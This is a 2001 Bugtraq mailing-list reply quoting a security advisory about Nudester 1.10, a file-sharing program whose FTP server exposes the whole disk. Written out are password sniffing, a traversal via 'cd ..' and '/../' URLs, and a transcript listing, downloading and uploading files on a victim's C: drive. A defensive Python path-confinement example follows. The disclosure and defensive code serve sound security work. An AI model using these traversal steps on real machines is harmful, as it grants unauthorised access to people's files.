[22316] in bugtraq
Re: [Real Security] Advisory for Nudester 1.10
daemon@ATHENA.MIT.EDU (ovix blue)
Sun Aug 19 22:05:49 2001
Message-ID: <001f01c1286e$570a2200$a500a8c0@nave>
Reply-To: "ovix blue" <ovix@comlogical.com>
From: "ovix blue" <ovix@comlogical.com>
To: <bugtraq@securityfocus.com>
Date: Sun, 19 Aug 2001 01:18:09 -0400
You can gain full FTP access without a password. Just log in to the person
running Nudester using any l/p and there you go. If you are using IE to
browse files you cannot directly view other folders. The workaround is
simple. ftp://127.0.0.0/../ will give you C:\ (the directory you start in is
c:\temp). I do not think you can upload files using this method, but you can
download and view folders/files. Using an FTP prog such as the one that
comes with Windows will allow full access. Don't know why that is. Not many
people use Nudester (I found only 5 users when I did a search).
----- Original Message -----
From: "Gary" <Cyph3r@phreaker.net>
To: <bugtraq@securityfocus.com>
Sent: Friday, August 17, 2001 2:34 AM
Subject: [Real Security] Advisory for Nudester 1.10
> <------------------------->
> [Real Security Advisory #1]
> [ Author: Cyph3r ]
> [ www.Real-Security.org ]
> [ Date: 08/16/2001 ]
> <------------------------->
> [Vulnerable: ]
> [Nudester 1.10(& below?)]
> [ OS: Win9x/me/2k/nt/xp ]
> [ Site: www.nudester.org ]
> <------------------------->
>
> -> Severity: Malicious users can gain full access to the user's files
> (upload/download)
>
> -> Overview: Nudester, a file sharing program for porn uses the FTP protocol
> to transfer files,
> The problem is it gives access to the whole hard disk instead of just the
> folder containing porn.
> Example:
> Open Nudester, and a sniffer program IE: Iris(www.eeye.com) and download a
> file from a user on Nudester
> While having the sniffer running filtering port 21 inclusive so you can get
> the password.
>
> <Sniffed Data>
>
> 220 ICS FTP Server ready
> user NUDESTER
> 331 Password required for NUDESTER
> pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
> 230 User NUDESTER logged in
>
> </Sniffed data>
>
> Open an ftp client and connect to the ip
>
> ftp> open ***.***.***.***
> Connected to ***.***.***.***
> 220 ICS FTP Server ready.
> User (***.***.***.***:(none)): NUDESTER
> 331 Password required for NUDESTER.
> Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
> 230 User NUDESTER logged in.
>
> - Bingo!
>
> ftp> dir
> 200 Port command successful.
> 150 Opening data connection for directory list.
> C:\TEMP\*.* not found
> 226 File sent ok
> ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
> ftp> cd ..
> 250 CWD command successful. "C:/" is current directory.
> ftp> DIR
> 200 Port command successful.
> 150 Opening data connection for directory list.
> -rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT
> -rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE
> -rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS
> -rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM
> -rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS
> -rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM
> -rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD
> -rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD
> drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI
> -rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS
> -rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS
> -rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK
> drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS
> drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000
> -rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT
> -rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK
> -rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT
> -rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT
> dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files
> -rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS
> -rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG
> -rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt
> -rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini
> drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt
> -rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE
> -rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE
> -rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE
> -rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ
> -rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC
> -rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC
> -rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC
> drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS
> -rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001
> drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts
> -rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt
> -rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM
> drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip
> drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped
> drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus
> drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music
> -rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt
> drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator
> -rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log
> 226 File sent ok
> ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.
>
> - Let's see if we have access to download a file
>
> ftp> get netsig.txt
> 200 Port command successful.
> 150 Opening data connection for netsig.txt.
> 226 File sent ok
> ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.
>
> - Yep, let's try to upload a file
>
> ftp> put c:\temp.txt
> 200 Port command successful.
> 150 Opening data connection for TEMP.TXT.
> 226 File received ok
>
> -> Conclusion: anyone can gain full access to Nudester user's files; the
> username is the same for every user
> However the password is not the same, you will have to sniff while
> downloading a file to retrieve the password,
> The only solution to this problem is not to use Nudester.
>
> -> Credits: Cyph3r - Cyph3r@phreaker.net
>
> -> Greets: Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid,
> spasms, trew, zeronine, matt, shizniz, z0mb1e
> b0b, neonfreon, dragnet, c0de, spiked and anyone else i missed.
>
>
>
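The transcript above shows `cd ..` moving the session from C:\TEMP to C:/, and the reply reaches the same place with `/../` in a URL. As an added example (not part of either post, and not Nudester's or the ICS FTP server's code), this is the kind of share-root confinement check an FTP server applies to every path argument before touching the disk; `SHARE_ROOT`, `resolve`, `to_real` and `escapes` are hypothetical names chosen for illustration.

```python
import ntpath

# Assumption: the share root is the start directory seen in the transcript.
SHARE_ROOT = "C:\\TEMP"


class PathEscape(Exception):
    """The client-supplied path would leave the shared folder."""


def resolve(cwd, arg):
    """Resolve a CWD/RETR/STOR argument; cwd is a list of parts below the root."""
    if "\x00" in arg or ":" in arg:
        # Blocks drive letters (C:\...), alternate data streams and NULs.
        raise PathEscape(arg)
    arg = arg.replace("\\", "/")  # Windows accepts both separators
    parts = [] if arg.startswith("/") else list(cwd)
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:  # the "cd .." issued from C:\TEMP in the advisory
                raise PathEscape(arg)
            parts.pop()
        elif comp.strip(". ") == "":
            # Dot/space-only names ("...", ".. "): Windows trims trailing
            # dots and spaces, so refuse rather than guess what they map to.
            raise PathEscape(arg)
        else:
            parts.append(comp)
    return parts


def to_real(cwd, arg):
    """Map a client path to a Windows path, re-checking containment."""
    full = ntpath.normpath(ntpath.join(SHARE_ROOT, *resolve(cwd, arg)))
    root, low = ntpath.normcase(SHARE_ROOT), ntpath.normcase(full)
    if low != root and not low.startswith(root + "\\"):
        raise PathEscape(arg)
    return full


def escapes(cwd, arg):
    """True if the request must be refused instead of served."""
    try:
        to_real(cwd, arg)
    except PathEscape:
        return True
    return False
```

A server using this keeps the virtual working directory as the component list returned by `resolve` and answers any refused request with a 550 reply, so the client never sees a path above the shared folder.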